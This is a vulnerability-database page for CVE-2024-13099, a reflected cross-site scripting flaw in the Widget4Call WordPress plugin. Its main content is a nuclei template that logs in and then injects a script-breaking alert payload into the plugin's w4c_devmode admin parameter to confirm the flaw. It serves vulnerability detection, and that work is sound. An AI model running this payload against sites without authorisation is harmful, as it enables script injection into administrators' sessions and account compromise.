Lucene search
K

Widget4Call WordPress - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Widget4Call WordPress plugin up to version 1.0.7 has reflected XSS from unsanitized output via a crafted URL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13099
1 Feb 202506:16
circl
CNNVD
WordPress plugin Widget4Call 安全漏洞
1 Feb 202500:00
cnnvd
CVE
CVE-2024-13099
1 Feb 202506:00
cve
Cvelist
CVE-2024-13099 Widget4call <= 1.0.7 - Reflected XSS
1 Feb 202506:00
cvelist
EUVD
EUVD-2024-51340
3 Oct 202520:07
euvd
NVD
CVE-2024-13099
1 Feb 202506:15
nvd
OSV
CVE-2024-13099
1 Feb 202506:15
osv
Patchstack
WordPress Widget4call plugin <= 1.0.7 - Reflected XSS vulnerability
31 Dec 202500:00
patchstack
Positive Technologies
PT-2025-1998
1 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13099
23 May 202507:11
redhatcve
Rows per page
id: CVE-2024-13099

info:
  name: Widget4Call WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Widget4Call WordPress plugin <= 1.0.7 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of Widget4Call plugin that addresses this issue.
  reference:
    - https://wpscan.com/vulnerability/a0cabf5c-7b01-4163-834b-a134db3a90b4/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-13099
    cwe-id: CWE-79
    epss-score: 0.00674
    epss-percentile: 0.47655
    cpe: cpe:2.3:a:apidaze:widget4call:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apidaze
    product: widget4call
  tags: cve,cve2024,wp-scan,wordpress,wp-plugin,apidaze,widget4call

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=w4c_devmode&_id=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 490a0046304402200fdee6b95dfba1e9f43e9d6f707034c7c840a4c98df162fd268434aa767ec93502204a130b509a594ce296d97f0a13efcce35fb8542b2303f4cefcca8258de9af1fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 16:23Current
7.2High risk
Vulners AI Score7.2
CVSS 3.15.4
EPSS0.00674
SSVC
11